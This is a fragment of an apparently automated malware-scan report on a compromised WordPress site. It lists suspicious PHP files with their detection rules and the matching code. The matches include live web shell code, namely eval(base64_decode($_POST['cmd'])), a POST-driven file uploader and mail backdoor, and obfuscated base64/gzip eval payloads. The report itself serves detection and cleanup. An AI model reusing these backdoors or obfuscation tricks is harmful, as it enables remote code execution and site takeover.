<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_19").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp_inrets.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_20" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIojiYTKPPsikyWI2ygCbFVDr67U0S9yrcFK...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIoj...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIoj...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">]));exit;}if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">])){</span><span style="color: #0000BB">$path</span><span style="color: #007700">=</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_FILENAME'</span><span style="color: #007700">]);if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'root'</span><span style="color: #007700">])&amp;&amp;&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'root'</span><span style="color: #007700">]==&nbsp;</span><span style="color: #DD0000">'http_root'</span><span style="color: #007700">){</span><span style="color: #0000BB">$path</span><span style="color: #007700">=</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">];}</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">'/'</span><span style="color: #007700">;if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'dir'</span><span style="color: #007700">])){</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'dir'</span><span style="color: #007700">];}if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">])){</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">,</span><span style="color: #0000BB">0777</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">);</span><span style="color: #0000BB">file_put_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">],</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">]));}exit;}if(empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'subject'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'from'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'fromName'</span><span style="color: #007700">]...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_20").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/dop.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_21" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_21").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/last.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_22" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_22").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp_inrets2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 37.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:19</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_23" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'eF7svXt/20auMPz/8/s932GidY+kRBdfcmmdOoljK42fdWzXVtqeE2f10hJlc0OJKkn50k3OZ38BzJ0cUpTt9LRny93GNjmDwWAwGAwGA7wKpsEg8dNG3Y/jKB6E0Xm9xQ7e7+83n//f//NKfYX3AyqRwOdV+9vEC8KONxoNrgcXvjfy43wR/3oWJf5gdjGrtyrUrkfjcb0YguszYR/7syhOg+l5HoNRkMxC7ybTiZUoHAHIxA/HbIutDE56xz/1jj/Uj94ewe/7b+ofRaHYn0QpoDeKrXLHvXeH/d5ge3f3mIpCYQcMqFLr1p6bH62KFkj+U4Mchl6SsJN3/SP2r//7fxg83YcP+S/sIeMfEj++9GOGnddfXl16MQum6k2X/zKbn4XBkK1gxcHR4XEfWl9/Qri7gQNRwxsWBlOf+dMREJc1RtG0nrLhhTc995uZFpM0hjIFje4c779BapzGp9NaQZt+mrCrCz+9gB6N/LP5+Tm2GSQ...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
